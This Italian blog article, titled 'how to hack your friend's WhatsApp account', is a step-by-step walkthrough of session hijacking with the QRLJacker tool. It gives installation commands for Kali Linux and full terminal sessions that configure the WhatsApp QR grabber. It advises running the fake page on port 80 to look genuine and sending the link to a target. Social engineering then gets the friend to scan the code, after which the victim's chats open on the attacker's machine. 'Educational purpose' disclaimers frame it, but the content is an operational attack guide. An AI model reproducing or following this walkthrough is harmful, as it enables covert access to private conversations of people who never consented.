Come hackerare l’account Whatsapp del tuo amico

Condividi questo articolo:


Questo articolo è solo a scopo educativo. Alcune parti sono state volutamente omesse.

DISCLAIMER LEGALE 

NON MI ASSUMO NESSUNA RESPONSABILITA' X L'UTILIZZO DELLE TECNICHE SOTTO RIPORTATE, LE QUALI SONO STATE DISTRIBUITE UNICAMENTE X CONDIVIDERE LE CONOSCENZE DA "ACQUISITE" (mitico edu...) E PER CERCARE QUALCUNO CON CUI CONFONTARE LE MIE ESPERIENZE E LE CONOSCENZE PER MIGLIORARE VICENDEVOLMENTE ....DIVERTENDOSI! Andrea Piani

Gli attacchi di ingegneria sociale funzionano ancora. La maggior parte degli aggressori utilizza metodi di social engineering per ingannare i bersagli. Secondo il ricercatore di hacking etico dell’istituto internazionale di sicurezza informatica, i metodi di social engineering sono utilizzati in QRLJacker, uno strumento che viene utilizzato per ottenere sessioni web di whats app. L’intero programma è scritto in python. Questo strumento funziona in base al principio del phishing. Il phishing è un tipo di attacco di social engineering in cui vengono generate false pagine di login o pagine di pagamento per raccogliere le credenziali degli utenti.

QRLJacker è lo strumento più comune usato in whatsapp session hijacking che può essere utile nella fase iniziale di pentesting.

Per i test abbiamo usato Live Kali Linux 2019.4 amd64. Durante i test di QrlJacker a volte, QRLJacker non lavorava sulle versioni installate di Kali linux. Abbiamo testato l’avvio onLive di Kali Linux 2018.4, 2018.3 & 2019.1 amd64.

Il driver Geeko agisce come motore del browser web utilizzato nelle applicazioni sviluppate da Mozilla. Crea un collegamento tra Selenium (un modulo Python) e il browser Mozilla.

    • Per l'installazione digitare wget https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-linux64.tar.gz
    • Digitare tar -xvzf geckodriver-v0.24.0-linux64.tar.gz e cambiare la directory con una estratta.
    • Digitare sudo mv -f geckodriver /usr/local/share/geckodriver
    • Digita sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
    • Digita sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
    • Ricordati di aggiornare il browser firefox. Per quel tipo sudo apt-get update & sudo apt-get installate firefox-esr
    • Digitare apt-get install python3.7
    • Digita git clone https://github.com/OWASP/QRLJacking
    • Digita python3.7 -m pip installare -r requirements.txt
    • Digita python3.7 QrlJacker.py
      
      
      
      

 

_____________________________________
!\/        !        \/         ./
!/\        !        |\       ./
!  \       !       /  \    ./
!   \______!______|    \ ,/
!   /\     !    ./\    ,/
! /   \    !    |  \ ,/
!/     \___!____|  ,/   Everything is connected, even the simplest things!
!     / \ _!__ *\,/
!    !   \ !  \,/
!    !  | \! ,/
!----------K/
!    ! ,!  /|     QrlJacker-Framework By @D4Vinci - V2.1
!    !/   / |      Attack vector By Mohamed Abdelbasset Elnouby (@SymbianSyMoh)
!   / \  /  |          Loaded 1 grabber(s), 0 post module(s).
!\./   \/   |
!/\    /    |
!  \  /    .o.
!   \/     :O:
!   /       "
!  /
! /
!/
!
!
!
QrlJacker > help

General commands
=================
        Command               Description
        ---------             -------------
        help/?                Show this help menu.
        os      <command>     Execute a system command without closing the framework
        banner                Display banner.
        exit/quit             Exit the framework.

Core commands
=============
        Command               Description
        ---------             -------------
        database              Prints the core version, check if framework is up-to-date and update if you are not up-to-date.
        debug                 Drop into debug mode or disable it. (Making identifying problems easier)
        dev                   Drop into development mode or disable it. (Reload modules every use)
        verbose               Drop into verbose mode or disable it. (Make framework displays more details)
        reload/refresh        Reload the modules database.
  • Digita listuse grabber/whatsapp
QrlJacker > list
 Name              Description
  grabber/whatsapp  Whatsapp QR-sessions grabber and controller
 QrlJacker > use grabber/whatsapp 

  • Type options & type set port 1337
  • Type set host 192.168.1.7
QrlJacker Module(grabber/whatsapp) > set port 1337
 [+] port => 1337
 QrlJacker Module(grabber/whatsapp) > set host 192.168.1.7
 [+] host => 192.168.1.7 
QrlJacker Module(grabber/whatsapp) > options
 Name       Current value  Required  Description
  port       1337             Yes       The local port to listen on.
  host       192.168.1.7        Yes       The local host to listen on.
  useragent  (default)      Yes       Make useragent is the (default) one, a (random) generated useragent or a specifed useragent
Digitare run, si può anche eseguire questo sulla porta 80 piuttosto che 1337, per sembrare una vera pagina di whatsapp


QrlJacker Module(grabber/whatsapp) > run  

QrlJacker Module(grabber/whatsapp) > run
 [+] Using the default useragent
 [+] Running a thread to keep the QR image  [whatsapp]
 [+] Waiting for sessions on whatsapp
 [+] Running a thread to detect Idle once it happens then click the QR reload button [whatsapp]
 [+] Initializing webserver… [whatsapp]

  •  avviare il server Qrljacker. Potete inviare questo link al vostro obiettivo. Per i test abbiamo aperto il codice generato QrlJacker Code su Windows 7. Type 192.168.1.7:1337

 Scansiona il codice QR in Whatsapp web del tuo cellulare o chiedi al tuo amico di effettuare il login in whatsapp web utilizzando le tecniche di social engineering

Vai al terminale dove hai avviato QrlJacker su Kali. Digita sessioni Le sessioni mostreranno gli account delle app Whats connesse alle sessioni di QrlJacker.

QrlJacker Module(grabber/whatsapp) > sessions
 ID  Module name  Captured on              
  0   whatsapp     Sat-Apr-13-04:53:03-2019

Mentre si digitano le sessioni -i 0, il browser web di Kali Linux si aprirà con l’account Whatsapp di destinazione Prima si aprirà web.whatsapp.com.

Ma dopo 1 o 2 secondi l’account Whatsapp si aprirà.

Ora potete vedere tutte le chat di whatsapp.

Questo articolo è solo a scopo educativo.

Ecco la tecnica in funzione:

Il video qui sopra è pubblicato da uno studente di hacking etico dell’International Institute of Cyber Security, Delhi India. Nella prossima pubblicazione analizzeremo come funziona QRLJacker

Questo articolo è solo a scopo educativo.


Per ulteriori informazioni visita il sito: immagi.net

Condividi questo articolo: